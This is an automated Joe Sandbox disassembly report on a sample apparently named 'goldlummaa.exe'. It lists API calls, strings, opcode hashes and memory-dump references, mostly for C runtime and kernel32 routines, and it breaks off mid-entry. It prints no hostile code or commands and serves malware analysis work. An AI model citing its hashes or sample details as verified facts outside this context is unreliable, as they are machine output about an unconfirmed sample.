                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_c60000_goldlummaa.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FeaturePresentProcessor
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2325560087-0
                                                                                                                  • Opcode ID: 097f3fccd8f14ed42f164182341e5ee8e62f467808a30c42dea018a1a39a7055
                                                                                                                  • Instruction ID: 9a8e8c3fa3b3ae50fe132d55b8fb15783947510ea9beb8e1d5d0c269b82033c9
                                                                                                                  • Opcode Fuzzy Hash: 097f3fccd8f14ed42f164182341e5ee8e62f467808a30c42dea018a1a39a7055
                                                                                                                  • Instruction Fuzzy Hash: 2DA13EB19116058FDB29CF58E8C57ADBBF1FB88324F29816EE41AE7360D3349980CB55
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00C6AF77: HeapAlloc.KERNEL32(00000008,?,?,?,00C697D4,00000001,00000364,?,00000002,000000FF,?,00C66931,00C78D78,0000000C), ref: 00C6AFB8
                                                                                                                  • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00C6C03B
                                                                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 00C6C12F
                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00C6C16E
                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00C6C1A1
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1376983453.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1376966491.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1376999743.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377013660.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377051161.0000000000C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377065117.0000000000C7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377079658.0000000000C80000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_c60000_goldlummaa.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Find$CloseFile$AllocFirstHeapNext
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2701053895-0
                                                                                                                  • Opcode ID: a1a6a22c6a1e73b80e5e3ecd9594cbcba4c6278a94d92a59599759e1c858c5fa
                                                                                                                  • Instruction ID: 11f8c234c4821347a1feda9645f60bdabc67c62bc7875333e628809b4ecf95d6
                                                                                                                  • Opcode Fuzzy Hash: a1a6a22c6a1e73b80e5e3ecd9594cbcba4c6278a94d92a59599759e1c858c5fa
                                                                                                                  • Instruction Fuzzy Hash: 8E516979900118AFDF34AFA88CC5AFE77A9DF45304F144199F429E3251EB308E82AF61
                                                                                                                  APIs
                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(Function_0000513C,00C64ACD), ref: 00C65020
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1376983453.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1376966491.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1376999743.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377013660.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377051161.0000000000C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377065117.0000000000C7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377079658.0000000000C80000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_c60000_goldlummaa.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ExceptionFilterUnhandled
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3192549508-0
                                                                                                                  • Opcode ID: ac7e8a9289a11d5a74cd64655f0aca7fb65fce705d3f0a07759ccb0edf18219c
                                                                                                                  • Instruction ID: 43f0182190722fd5e170c9116a6fca192c519f0b3689ed4802ac6464263ce92e
                                                                                                                  • Opcode Fuzzy Hash: ac7e8a9289a11d5a74cd64655f0aca7fb65fce705d3f0a07759ccb0edf18219c
                                                                                                                  • Instruction Fuzzy Hash:
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1376983453.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1376966491.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1376999743.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377013660.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377051161.0000000000C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377065117.0000000000C7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377079658.0000000000C80000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_c60000_goldlummaa.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: HeapProcess
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 54951025-0
                                                                                                                  • Opcode ID: ac300966117bf5e237ca2baffd555a125bcd380037cffdb78516f0eced2e4822
                                                                                                                  • Instruction ID: b1d6f5c3358ed703c21611fd0e744ab8a8df6b8ead5d7d7d87e5fcc5fdd17a27
                                                                                                                  • Opcode Fuzzy Hash: ac300966117bf5e237ca2baffd555a125bcd380037cffdb78516f0eced2e4822
                                                                                                                  • Instruction Fuzzy Hash: 3EA001706826018F97408F36AA4971D7BA9AA8A6917094469A62DC5260EB3888D8AA01
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1376983453.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1376966491.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1376999743.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377013660.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377051161.0000000000C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377065117.0000000000C7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377079658.0000000000C80000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_c60000_goldlummaa.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 1849cba6a0736f9c3bf58dda02a9218c9b4c04fdd09a8b01c2c98000a5929a08
                                                                                                                  • Instruction ID: 6c9ad67a6121de2a1d56fabf52e671dc7326f26cf1cc6df6d2069c4bc46a6e4a
                                                                                                                  • Opcode Fuzzy Hash: 1849cba6a0736f9c3bf58dda02a9218c9b4c04fdd09a8b01c2c98000a5929a08
                                                                                                                  • Instruction Fuzzy Hash: BA518AB0D0020D9FCB50DFA8D6919EEBBF4EB09351F28545AE815FB310D734AA41CB65
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1376983453.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1376966491.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1376999743.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377013660.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377051161.0000000000C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377065117.0000000000C7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377079658.0000000000C80000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_c60000_goldlummaa.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 126821a72a6442578fa07476dabd530d4dcc1109ac11dc68fcd923ef03b2f076
                                                                                                                  • Instruction ID: 52277072fdbc9e4033fd08337c4772c4cb6c93532a6fd81652deab93037b253e
                                                                                                                  • Opcode Fuzzy Hash: 126821a72a6442578fa07476dabd530d4dcc1109ac11dc68fcd923ef03b2f076
                                                                                                                  • Instruction Fuzzy Hash: 59D0923A641A59EFC310CF49E440E41F7B8FB8D670B168166EA0893B20C331FC51CAE0
                                                                                                                  APIs
                                                                                                                  • GetCPInfo.KERNEL32(0122FD58,0122FD58,00000000,7FFFFFFF,?,00C6F863,0122FD58,0122FD58,00000000,0122FD58,?,?,?,?,0122FD58,00000000), ref: 00C6F91E
                                                                                                                  • __alloca_probe_16.LIBCMT ref: 00C6F9D9
                                                                                                                  • __alloca_probe_16.LIBCMT ref: 00C6FA68
                                                                                                                  • __freea.LIBCMT ref: 00C6FAB3
                                                                                                                  • __freea.LIBCMT ref: 00C6FAB9
                                                                                                                  • __freea.LIBCMT ref: 00C6FAEF
                                                                                                                  • __freea.LIBCMT ref: 00C6FAF5
                                                                                                                  • __freea.LIBCMT ref: 00C6FB05
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1376983453.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1376966491.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1376999743.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377013660.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377051161.0000000000C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377065117.0000000000C7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377079658.0000000000C80000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_c60000_goldlummaa.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: __freea$__alloca_probe_16$Info
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 127012223-0
                                                                                                                  • Opcode ID: c31bece3a17abd32fb90115ba4abf8e4fba8167dd61c9aae5abd7350a358ca22
                                                                                                                  • Instruction ID: 5466fdd737a7fbec294c30034ab9932f559b524f08aa4aaa507e130d3be4eaaf
                                                                                                                  • Opcode Fuzzy Hash: c31bece3a17abd32fb90115ba4abf8e4fba8167dd61c9aae5abd7350a358ca22
                                                                                                                  • Instruction Fuzzy Hash: BB71F672A002056BDF319F94ECD1FAE77A59F45314F29007DE924E7282EB318D42D7A0
                                                                                                                  APIs
                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 00C65CB7
                                                                                                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 00C65CBF
                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 00C65D48
                                                                                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 00C65D73
                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 00C65DC8
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1376983453.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1376966491.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1376999743.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377013660.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377051161.0000000000C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377065117.0000000000C7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377079658.0000000000C80000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_c60000_goldlummaa.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                  • String ID: csm
                                                                                                                  • API String ID: 1170836740-1018135373
                                                                                                                  • Opcode ID: 901aa07a6c33f52b05f2527f7f30f4ceabd7e9103f20e8f6e6eb28e0ed74c121
                                                                                                                  • Instruction ID: 373f8d96e0cfa2f534a4994ec8ec27b998b9379b347ecedcafd1b45447510522
                                                                                                                  • Opcode Fuzzy Hash: 901aa07a6c33f52b05f2527f7f30f4ceabd7e9103f20e8f6e6eb28e0ed74c121
                                                                                                                  • Instruction Fuzzy Hash: 8141D634A00619ABCF20DF69C8C8A9EBBB5FF45314F248155E9285B392D731EA45CB91
                                                                                                                  APIs
                                                                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00C648A5
                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 00C648B3
                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetTempPath2W), ref: 00C648C4
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1376983453.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1376966491.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1376999743.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377013660.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377051161.0000000000C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377065117.0000000000C7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377079658.0000000000C80000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_c60000_goldlummaa.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressProc$HandleModule
                                                                                                                  • String ID: GetSystemTimePreciseAsFileTime$GetTempPath2W$kernel32.dll
                                                                                                                  • API String ID: 667068680-1047828073
                                                                                                                  • Opcode ID: 725de0535ace42e70d866c806a2998368d53b82af9aadd04fdb858b053643e63
                                                                                                                  • Instruction ID: c575023244e3af06e1f64c284f72b21b2c7b75ff2912846dc0d4a20a6c2e0a62
                                                                                                                  • Opcode Fuzzy Hash: 725de0535ace42e70d866c806a2998368d53b82af9aadd04fdb858b053643e63
                                                                                                                  • Instruction Fuzzy Hash: DBD0C7315C2A209F93509F74BC0EB5E3EA4EA057513018135F71DD2251DBB449888BA0
                                                                                                                  APIs
                                                                                                                  • GetLastError.KERNEL32(?,?,00C67F40,00C65A6B,00C65180), ref: 00C67F57
                                                                                                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00C67F65
                                                                                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00C67F7E
                                                                                                                  • SetLastError.KERNEL32(00000000,00C67F40,00C65A6B,00C65180), ref: 00C67FD0
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1376983453.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1376966491.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1376999743.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377013660.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377051161.0000000000C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377065117.0000000000C7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377079658.0000000000C80000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_c60000_goldlummaa.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLastValue___vcrt_
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3852720340-0
                                                                                                                  • Opcode ID: 0746af6793d4c4ea50815d53d4c77ae68cefbe2b6dbda556134b5fe2a445c8c3
                                                                                                                  • Instruction ID: 8c6b828a2233fa19ceceff4cedcc333e5ad65f3e5283d1a91747523029256573
                                                                                                                  • Opcode Fuzzy Hash: 0746af6793d4c4ea50815d53d4c77ae68cefbe2b6dbda556134b5fe2a445c8c3
                                                                                                                  • Instruction Fuzzy Hash: 2901F73260C2126EA73927F5ACC5F2F37A4DF867B97200B2AF128851F0FF514C86A152
                                                                                                                  APIs
                                                                                                                  • type_info::operator==.LIBVCRUNTIME ref: 00C688F8
                                                                                                                  • CallUnexpected.LIBVCRUNTIME ref: 00C68B71
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1376983453.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1376966491.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1376999743.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377013660.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377051161.0000000000C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377065117.0000000000C7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377079658.0000000000C80000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_c60000_goldlummaa.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CallUnexpectedtype_info::operator==
                                                                                                                  • String ID: csm$csm$csm
                                                                                                                  • API String ID: 2673424686-393685449
                                                                                                                  • Opcode ID: d24bed82c37ff61d3d57c45649abf8b5eae13114d7b6e0bbffdcde5fae6782eb
                                                                                                                  • Instruction ID: bc17f7737182166b46f0cfb2fcaba35794b37869ed93d75e48f587cce775b7ea
                                                                                                                  • Opcode Fuzzy Hash: d24bed82c37ff61d3d57c45649abf8b5eae13114d7b6e0bbffdcde5fae6782eb
                                                                                                                  • Instruction Fuzzy Hash: 8FB18D71800209EFCF38DFA4C8C19AEB7B5FF44314F14465AE9216B252DB31DA5ADB92
                                                                                                                  Strings
                                                                                                                  • C:\Users\user\Desktop\goldlummaa.exe, xrefs: 00C6C2E0
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1376983453.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1376966491.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1376999743.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377013660.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377051161.0000000000C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377065117.0000000000C7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377079658.0000000000C80000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_c60000_goldlummaa.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: C:\Users\user\Desktop\goldlummaa.exe
                                                                                                                  • API String ID: 0-3961576614
                                                                                                                  • Opcode ID: 91c58075236d8c9bdba84c591242bf236afa9ab35098e7872cab18f787b76dc4
                                                                                                                  • Instruction ID: bbd70bc84b3756fee1935337d646dad07a49d5d7d6963ba5b2e1b69a7b3d24c4
                                                                                                                  • Opcode Fuzzy Hash: 91c58075236d8c9bdba84c591242bf236afa9ab35098e7872cab18f787b76dc4
                                                                                                                  • Instruction Fuzzy Hash: 96219D71600205AFDB30AFB6CCC1DBB77A9AF44368710C925F9A9D7260DB31ED509BA1
                                                                                                                  APIs
                                                                                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,50496CFE,?,?,00000000,00C71B77,000000FF,?,00C66B21,00000002,?,00C66BBD,00C67DE9), ref: 00C66A95
                                                                                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00C66AA7
                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,00000000,00C71B77,000000FF,?,00C66B21,00000002,?,00C66BBD,00C67DE9), ref: 00C66AC9
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1376983453.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1376966491.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1376999743.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377013660.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377051161.0000000000C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377065117.0000000000C7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377079658.0000000000C80000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_c60000_goldlummaa.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                                                                  • API String ID: 4061214504-1276376045
                                                                                                                  • Opcode ID: 7f885fb526d5af4b732cb2fb12da65804ffdd76c34cc392c3750c1522e94d3b9
                                                                                                                  • Instruction ID: cbd08bab87702d7d691c1d7d84a9bb0bccbda58a42d957d290b69aeac26694c5
                                                                                                                  • Opcode Fuzzy Hash: 7f885fb526d5af4b732cb2fb12da65804ffdd76c34cc392c3750c1522e94d3b9
                                                                                                                  • Instruction Fuzzy Hash: 2901F971944619FFCB118F90CC49FBEB7B8FB44B14F044229F826E22D0DB749944CA80
                                                                                                                  APIs
                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00C6470A
                                                                                                                  • AcquireSRWLockExclusive.KERNEL32(?,?,00000000,00C71B20,000000FF,?,00C63552), ref: 00C64729
                                                                                                                  • AcquireSRWLockExclusive.KERNEL32(?,?,?,?,00000000,00C71B20,000000FF,?,00C63552), ref: 00C64757
                                                                                                                  • TryAcquireSRWLockExclusive.KERNEL32(?,?,?,?,00000000,00C71B20,000000FF,?,00C63552), ref: 00C647B2
                                                                                                                  • TryAcquireSRWLockExclusive.KERNEL32(?,?,?,?,00000000,00C71B20,000000FF,?,00C63552), ref: 00C647C9
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1376983453.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1376966491.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1376999743.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377013660.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377051161.0000000000C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377065117.0000000000C7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377079658.0000000000C80000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_c60000_goldlummaa.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AcquireExclusiveLock$CurrentThread
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 66001078-0
                                                                                                                  • Opcode ID: 2f7cb87176023b27672013303e3c3c47ce2c39b81188221f8406acc4ba1bae9b
                                                                                                                  • Instruction ID: cd96d6fa93c394fe8e9d3243885205bc8f1e1a81c3bef37520624b2301cc9c0b
                                                                                                                  • Opcode Fuzzy Hash: 2f7cb87176023b27672013303e3c3c47ce2c39b81188221f8406acc4ba1bae9b
                                                                                                                  • Instruction Fuzzy Hash: EF41603590064ADFCB38DF65C8C5AAAB3F5FF0A311B10492AD466D7A81D730FA84CB61
                                                                                                                  APIs
                                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00C6D29C,00000000,?,00C7B728,?,?,?,00C6D1D3,00000004,InitializeCriticalSectionEx,00C73740,00C73748), ref: 00C6D20D
                                                                                                                  • GetLastError.KERNEL32(?,00C6D29C,00000000,?,00C7B728,?,?,?,00C6D1D3,00000004,InitializeCriticalSectionEx,00C73740,00C73748,00000000,?,00C68E2C), ref: 00C6D217
                                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00C6D23F
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1376983453.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1376966491.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1376999743.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377013660.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377051161.0000000000C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377065117.0000000000C7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377079658.0000000000C80000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_c60000_goldlummaa.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: LibraryLoad$ErrorLast
                                                                                                                  • String ID: api-ms-
                                                                                                                  • API String ID: 3177248105-2084034818
                                                                                                                  • Opcode ID: e81ebc06310108723d6dad820694ee66253aa793a655dfe7a5c541e6d4e64098
                                                                                                                  • Instruction ID: 5ba8915da9d1fc70d49f0bbdaed256ea752c90e1dee6efcd8f26f3dae21e9299
                                                                                                                  • Opcode Fuzzy Hash: e81ebc06310108723d6dad820694ee66253aa793a655dfe7a5c541e6d4e64098
                                                                                                                  • Instruction Fuzzy Hash: 64E01A70B80208B7EB211B61EC4AF683B649F40B52F144020FE1DE80A1DFB1EED89584
                                                                                                                  APIs
                                                                                                                  • GetConsoleOutputCP.KERNEL32(50496CFE,00000000,00000000,?), ref: 00C6DD0B
                                                                                                                    • Part of subcall function 00C6C8A1: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00C6D6D0,?,00000000,-00000008), ref: 00C6C902
                                                                                                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00C6DF5D
